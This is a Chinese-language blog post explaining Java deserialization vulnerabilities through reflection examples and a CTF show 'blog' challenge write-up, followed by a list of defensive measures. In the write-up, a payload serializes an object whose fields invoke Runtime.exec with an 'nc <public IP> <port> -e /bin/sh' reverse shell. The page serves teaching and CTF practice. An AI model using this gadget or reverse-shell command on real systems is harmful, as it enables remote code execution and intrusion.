
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>反序列化漏洞 in Java | Myease の Page</title>
    <meta name="author" content="Myease" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>


<script src="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/contrib/auto-render.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css" />
<script src="/js/lib/math.js"></script>


<script src="/js/lib/preview.js"></script>






<script src="https://s4.zstatic.net/ajax/libs/waline/2.15.8/waline.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/waline/2.15.8/waline.min.css" />
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/waline/2.15.8/waline-meta.min.css" />




<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>MYEASE の PAGE</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;MYEASE の PAGE</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article-toc">
    
    <div id="toccard">
        <div id="toccard-style">
    <div id="card-div">
        <div class="description">
            <h3><span id="x2b50文章目录x2b50"><span class="emoji" alias="star" style fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8">&#x2b50;</span>文章目录<span class="emoji" alias="star" style fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8">&#x2b50;</span></span></h3>
<!-- toc -->
<ul>
<li><a href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%9F%BA%E7%A1%80">反序列化漏洞基础</a>
<ul>
<li><a href="#%E5%BA%8F%E5%88%97%E5%8C%96">序列化</a></li>
<li><a href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">反序列化</a></li>
<li><a href="#%E5%BA%8F%E5%88%97%E5%8C%96-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9C%A8-java-%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E4%BD%93%E7%8E%B0">序列化、反序列化在 Java 代码中的体现</a></li>
<li><a href="#java-%E5%8F%8D%E5%B0%84%E6%9C%BA%E5%88%B6">Java 反射机制</a></li>
<li><a href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0">漏洞成因</a></li>
</ul>
</li>
<li><a href="#%E4%BB%A5-ctf-show-%E5%8D%95%E8%BA%AB%E6%9D%AF-web-blog-%E4%B8%BA%E4%BE%8B%E5%88%86%E6%9E%90">以 CTF show [单身杯 WEB] blog 为例分析</a></li>
<li><a href="#%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD">防御措施:</a></li>
<li><a href="#%E5%8F%82%E8%80%83">参考:</a></li>
</ul>
<!-- tocstop -->
<p><span class="emoji" alias="point_down" style fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f447.png?v8">
        </div>
    </div>
</div>


    </div>
    
    <div class="article">
        <div>
            <h1>反序列化漏洞 in Java</h1>
        </div>
        <div class="info">
            <span class="date">
                <span class="icon">
                    <i class="fa-solid fa-calendar fa-fw"></i>
                </span>
                2024/7/19
            </span>
            
            
            <span class="tags">
                <span class="icon">
                    <i class="fa-solid fa-tags fa-fw"></i>
                </span>
                
                
                <span class="tag">
                    
                    <a href="/tags/%E8%AF%BE%E5%A4%96%E5%AD%A6%E4%B9%A0/" style="color: #03a9f4">
                        课外学习
                    </a>
                </span>
                
                <span class="tag">
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E/" style="color: #00bcd4">
                        漏洞
                    </a>
                </span>
                
            </span>
            
        </div>
        
        <div class="content" v-pre>
            <h3><span id="x2b50文章目录x2b50"><span class="emoji" alias="star" style fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8">&#x2b50;</span>文章目录<span class="emoji" alias="star" style fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8">&#x2b50;</span></span></h3>
<!-- toc -->
<ul>
<li><a href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%9F%BA%E7%A1%80">反序列化漏洞基础</a>
<ul>
<li><a href="#%E5%BA%8F%E5%88%97%E5%8C%96">序列化</a></li>
<li><a href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">反序列化</a></li>
<li><a href="#%E5%BA%8F%E5%88%97%E5%8C%96-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9C%A8-java-%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E4%BD%93%E7%8E%B0">序列化、反序列化在 Java 代码中的体现</a></li>
<li><a href="#java-%E5%8F%8D%E5%B0%84%E6%9C%BA%E5%88%B6">Java 反射机制</a></li>
<li><a href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0">漏洞成因</a></li>
</ul>
</li>
<li><a href="#%E4%BB%A5-ctf-show-%E5%8D%95%E8%BA%AB%E6%9D%AF-web-blog-%E4%B8%BA%E4%BE%8B%E5%88%86%E6%9E%90">以 CTF show [单身杯 WEB] blog 为例分析</a></li>
<li><a href="#%E9%98%B2%E5%BE%A1%E6%8E%AA%E6%96%BD">防御措施:</a></li>
<li><a href="#%E5%8F%82%E8%80%83">参考:</a></li>
</ul>
<!-- tocstop -->
<p><span class="emoji" alias="point_down" style fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f447.png?v8">👇</span></p>
<h2><span id="反序列化漏洞基础">反序列化漏洞基础</span></h2>
<h3><span id="序列化">序列化</span></h3>
<p>将结构对象数据转换成字节序列的形式。</p>
<h3><span id="反序列化">反序列化</span></h3>
<p>把字节序列恢复成对象。</p>
<h3><span id="序列化-反序列化在-java-代码中的体现">序列化、反序列化在 Java 代码中的体现</span></h3>
<pre><code class="language-Java">package serialize;   //初始化定义一个类

import java.io.Serializable;

public class User implements Serializable&#123;
    private String name;
    public void setName(String name) &#123;
        this.name=name;
    &#125;
    public String getName() &#123;
        return name;
    &#125;
&#125;
</code></pre>
<pre><code class="language-Java">package serialize;

import java.io.*;

public class Main &#123;
    public static void main(String[] args) throws Exception &#123;
        User user=new User();
        user.setName(&quot;leixiao&quot;);

        byte[] serializeData=serialize(user);
        FileOutputStream fout = new FileOutputStream(&quot;user.bin&quot;);
        fout.write(serializeData);
        fout.close();
        User user2=(User) unserialize(serializeData);
        System.out.println(user2.getName());
    &#125;
    public static byte[] serialize(final Object obj) throws Exception &#123;              //序列化
        ByteArrayOutputStream btout = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(btout);
        objOut.writeObject(obj);
        return btout.toByteArray();
    &#125;
    public static Object unserialize(final byte[] serialized) throws Exception &#123;     //反序列化
        ByteArrayInputStream btin = new ByteArrayInputStream(serialized);
        ObjectInputStream objIn = new ObjectInputStream(btin);
        return objIn.readObject();
    &#125;
&#125;
</code></pre>
<h3><span id="java-反射机制">Java 反射机制</span></h3>
<p>对于任意一个类，都能够得到这个类的所有属性和方法；对于任意一个对象，都能够调用它的任意方法和属性；这种动态获取信息以及动态调用对象方法的功能称为java语言的反射机制。
以下是常见的获取class信息的方法：</p>
<pre><code class="language-Java">package reflection;

public class User &#123;        //定义一个User类作为示范
    private String name;

    public User(String name) &#123;
        this.name=name;
    &#125;
    public void setName(String name) &#123;
        this.name=name;
    &#125;
    public String getName() &#123;
        return name;
    &#125;
&#125;
</code></pre>
<pre><code class="language-Java">package reflection;

import java.lang.reflect.*;

public class CallMethod &#123;
    public static void main(String[] args) throws Exception &#123;
        Class UserClass=Class.forName(&quot;reflection.User&quot;);

        Constructor constructor=UserClass.getConstructor(String.class);//利用该类创建类
        User user=(User) constructor.newInstance(&quot;leixiao&quot;);

        Method method = UserClass.getDeclaredMethod(&quot;setName&quot;, String.class);  //调用method
        method.invoke(user, &quot;l3yx&quot;);

        Field field= UserClass.getDeclaredField(&quot;name&quot;);  //访问属性
        field.setAccessible(true);  // name是私有属性，需要先设置可访问
        field.set(user, &quot;l3yx&quot;);

        System.out.println(user.getName());
    &#125;
&#125;
</code></pre>
<h3><span id="漏洞成因">漏洞成因</span></h3>
<p>当输入的反序列化的数据可被用户控制，那么攻击者即可通过构造恶意输入，让反序列化产生非预期的对象，在此过程中执行构造的任意代码。</p>
<pre><code class="language-Java">package reflection; //利用反射执行java.lang.Runtime.getRuntime().exec(&quot;calc.exe&quot;);

public class Exec &#123;
    public static void main(String[] args) throws Exception &#123;

        Class runtimeClass=Class.forName(&quot;java.lang.Runtime&quot;);
        Object runtime=runtimeClass.getMethod(&quot;getRuntime&quot;).invoke(null);// getRuntime是静态方法，invoke时不需要传入对象
        runtimeClass.getMethod(&quot;exec&quot;, String.class).invoke(runtime,&quot;calc.exe&quot;);
    &#125;
&#125;
</code></pre>
<h2><span id="以-ctf-show-单身杯-web-blog-为例分析">以 CTF show [单身杯 WEB] blog 为例分析</span></h2>
<p>本题思路主要是造反序列化命令执行payload实现反弹shell，从而实现任意文件可读。在此题目前半部分如何成为admin，class文件读取部分略过。(简单复现漏洞，具体题目解法请见他人write up)</p>
<pre><code class="language-Java">//在UserEntity.java中，发现可以通过反序列化输入控制username,password,email,address四个数据。
private void readObject(ObjectInputStream input)
            throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException
    &#123;
        input.defaultReadObject();
        Class.forName(username).getMethod(email, new Class[] &#123;
                String.class
        &#125;).invoke(Class.forName(username).getMethod(password, new Class[0]).invoke(Class.forName(username), new Object[0]), new Object[] &#123;
                address
        &#125;);
    &#125;
</code></pre>
<pre><code class="language-Java">//由AdminController.java文件得知对方是通过url读取数据。
public String adminConsole(String token, String url, HttpSession session, Model model)
        throws IOException, ClassNotFoundException
    &#123;
        if(token != null &amp;&amp; token.equals(session.getAttribute(&quot;token&quot;))) // 判断token参数是否一致
        &#123;
            URL fileUrl = new URL(url); // 文件读取
            ObjectInputStream objectInputStream = new ObjectInputStream(fileUrl.openStream());
            objectInputStream.readObject();
            model.addAttribute(&quot;message&quot;, &quot;\u66F4\u65B0\u6210\u529F&quot;);
        &#125; else
        &#123;
            model.addAttribute(&quot;message&quot;, &quot;\u66F4\u65B0\u5931\u8D25\uFF0Ctoken\u65E0\u6548&quot;);
        &#125;
        return &quot;pageMessage&quot;;
    &#125;

</code></pre>
<pre><code class="language-Java">//构造payload实现反弹shell
public class Main &#123;
    public static void main(String[] args) throws IOException, ClassNotFoundException &#123;
        UserEntity userEntity = new UserEntity();
        userEntity.setUsername(&quot;java.lang.Runtime&quot;);
        userEntity.setPassword(&quot;getRuntime&quot;);
        userEntity.setEmail(&quot;exec&quot;);
        userEntity.setAddress(&quot;nc 公网ip地址 监听端口 -e /bin/sh&quot;);
        FileOutputStream fos = new FileOutputStream(&quot;exp&quot;);
        ObjectOutputStream out = new ObjectOutputStream(fos);
        out.writeObject(userEntity);
        out.close();
        fos.close();
    &#125;
&#125;
</code></pre>
<p>然后将得到的字节序列数据转码并发起post请求，实现任意文件可读，找到flag文件。</p>
<h2><span id="防御措施">防御措施:</span></h2>
<blockquote>
<p>1.避免反序列化不可信数据：不要从不受信任的源或用户接受序列化数据。 2.使用安全的库：例如，使用 Apache Commons Lang 的 SerializationUtils 类，它提供了更安全的序列化 API。 3.更新和修补：保持 Java 环境和所有依赖的库更新到最新版本。 4.实施类型检查和输入验证：在反序列化前检查数据的合法性。</p>
</blockquote>
<h2><span id="参考">参考:</span></h2>
<p>1.<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6787?time__1311=n4%2BxnD0Dg7GQ0%3DDk83DsA3gcYGOzKDcCeKcpoD">Java 反序列化漏洞原理解析</a><br> 2.<a target="_blank" rel="noopener" href="https://blog.csdn.net/2301_76427295/article/details/135362917">Java 反序列化漏洞利用及修复 示例代码</a><br> 3.<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44700621/article/details/125131098">Java 反序列化代码执行案例分析</a><br></p>

        </div>

        
        
        
        
        
        <div id="comment">
            <div id="waline-container"></div>
        </div>
        
        
        
    </div>

</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2024 - 2024 Myease の Page
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;Myease
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    


<script>
    Waline.init({
        el: "#waline-container",
        serverURL: "vercin.vercel.app",
        commentCount: true,
        pageview: false,
        emoji: "https://unpkg.com/@waline/emojis@1.2.0/weibo,https://unpkg.com/@waline/emojis@1.2.0/alus,https://unpkg.com/@waline/emojis@1.2.0/bilibili,https://unpkg.com/@waline/emojis@1.2.0/qq,https://unpkg.com/@waline/emojis@1.2.0/tieba,https://unpkg.com/@waline/emojis@1.2.0/tw-emoji".split(","),
        meta: "nick,mail,link".split(","),
        requiredMeta: "nick".split(","),
        lang: "",
        wordLimit: 0,
        pageSize: "10",
        login: "enable",
        
    });
</script>



    
    <canvas
            id="fireworks"
            style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: 32767"
    ></canvas>
    <script src="https://s4.zstatic.net/ajax/libs/animejs/3.2.1/anime.min.js"></script>
    <script src="/js/fireworks.min.js"></script>
</body>
</html>
